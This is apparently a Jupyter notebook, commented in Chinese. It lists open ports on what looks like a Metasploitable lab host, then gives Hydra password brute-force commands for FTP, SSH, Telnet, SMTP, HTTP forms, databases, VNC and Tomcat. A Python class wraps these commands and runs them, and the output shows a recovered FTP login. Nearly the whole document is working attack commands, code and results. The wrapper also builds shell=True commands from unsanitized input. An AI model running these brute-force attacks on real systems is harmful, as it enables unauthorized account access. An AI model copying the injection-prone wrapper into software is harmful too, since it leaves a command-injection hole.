# 引用.ipynb使用%run 命令

21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown


# 目标IP变量（替换为目标IP）
TARGET="192.168.1.100"

# 用户名和密码字典（替换为实际字典路径）
USER_FILE="/path/to/usernames.txt"
PASS_FILE="/path/to/passwords.txt"

# FTP (21/tcp)
hydra -L $USER_FILE -P $PASS_FILE -t 4 -f $TARGET ftp

# SSH (22/tcp)
hydra -L $USER_FILE -P $PASS_FILE -t 4 -f $TARGET ssh -s 22

# Telnet (23/tcp)
hydra -L $USER_FILE -P $PASS_FILE -f $TARGET telnet -s 23

# SMTP (25/tcp) - 用户枚举或认证爆破
# 枚举用户（VRFY命令）：
hydra -L $USER_FILE $TARGET smtp-enum -s 25
# 认证爆破：
hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp-auth -s 25

# HTTP (80/tcp) - 基础认证/表单爆破
# 基础认证（如/admin）：
hydra -L $USER_FILE -P $PASS_FILE $TARGET http-get /admin
# 表单爆破（替换表单参数）：
hydra -l admin -P $PASS_FILE $TARGET http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"

# MySQL (3306/tcp)
hydra -L $USER_FILE -P $PASS_FILE -f $TARGET mysql -s 3306

# PostgreSQL (5432/tcp)
hydra -L $USER_FILE -P $PASS_FILE -f $TARGET postgres -s 5432

# VNC (5900/tcp) - 仅需密码
hydra -P $PASS_FILE -f $TARGET vnc -s 5900

# AJP13 (8009/tcp) - Tomcat管理器爆破
hydra -L $USER_FILE -P $PASS_FILE $TARGET http-form-post \
"/manager/html/j_security_check:j_username=^USER^&j_password=^PASS^:Authentication Failed" \
-s 8009

# 未知服务 (8180/tcp) - 假设为HTTP
hydra -L $USER_FILE -P $PASS_FILE $TARGET http-get -s 8180

In [13]:
import subprocess
import json
class Hydra:
    def __init__(self, ip, port, user, passwd):
        # 存储基本参数
        self.ip = ip
        self.port = port
        self.user = user
        self.passwd = passwd
        
    def _build_command(self, service, vnc_mode=False):
        """构建Hydra命令的通用方法"""
        base_cmd = f"hydra -L {self.user} -P {self.passwd} {self.ip} -s {self.port}"
        if vnc_mode:
            # VNC模式只使用密码
            base_cmd = f"hydra -P {self.passwd} {self.ip} -s {self.port}"
        
        # 添加服务类型和XML输出选项
        return f"{base_cmd} {service} -o {service}_result.json -b json"

    def hydra_ssh(self):
        """执行SSH爆破"""
        cmd = self._build_command("ssh")
        print(cmd)
        subprocess.run(cmd, shell=True)
        return self.format_json("ssh_result.json")

    def hydra_samba(self):
        """执行Samba爆破"""
        cmd = self._build_command("smb")
        subprocess.run(cmd, shell=True)
        return self.format_json("samba_result.json")

    def hydra_ftp(self):
        """执行FTP爆破"""
        cmd = self._build_command("ftp")
        subprocess.run(cmd, shell=True)
        return self.format_json("ftp_result.json")

    def hydra_mysql(self):
        """执行MySQL爆破"""
        cmd = self._build_command("mysql")
        subprocess.run(cmd, shell=True)
        return self.format_json("mysql_result.json")

    def hydra_postgre(self):
        """执行PostgreSQL爆破"""
        cmd = self._build_command("postgres")
        subprocess.run(cmd, shell=True)
        return self.format_json("postgres_result.json")

    def hydra_vnc(self):
        """执行VNC爆破"""
        # VNC模式特殊处理
        cmd = f"hydra -P {self.passwd} {self.ip} -s {self.port} vnc -o vnc_result.json -b json"
        subprocess.run(cmd, shell=True)
        return self.format_json("vnc_result.json")


    def hydra_telnet(self):
        """执行Telnet爆破"""
        cmd = self._build_command("telnet")
        subprocess.run(cmd, shell=True)
        return self.format_json("telnet_result.json")

    def hydra_smtp(self):
        """执行SMTP爆破"""
        cmd = self._build_command("smtp")
        subprocess.run(cmd, shell=True)
        return self.format_json("smtp_result.json")
    def format_json(self, file_name):
        with open(file_name, "r") as f:
            try:
                data=json.load(f)
                status=data['success']
                user=data['results'][0]['login']
                password=data['results'][0]['password']
                return {"status": status, "user": user, "password": password}
            except json.JSONDecodeError:
                print("爆破结果解析失败，可能是文件格式错误或内容为空。")
        """格式化JSON数据"""
        

# 使用示例
if __name__ == "__main__":
    # 初始化参数
    hydra = Hydra(ip='192.168.19.134', port=21, user='users.txt', passwd='password.txt')
    # 执行FTP爆破
    ftp_results = hydra.hydra_ftp()
    print("FTP破解结果:", ftp_results)
    


Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-15 03:41:31
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ftp://192.168.19.134:21/
[21][ftp] host: 192.168.19.134   login: msfadmin   password: msfadmin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-07-15 03:41:35
FTP破解结果: {'status': True, 'user': 'msfadmin', 'password': 'msfadmin'}
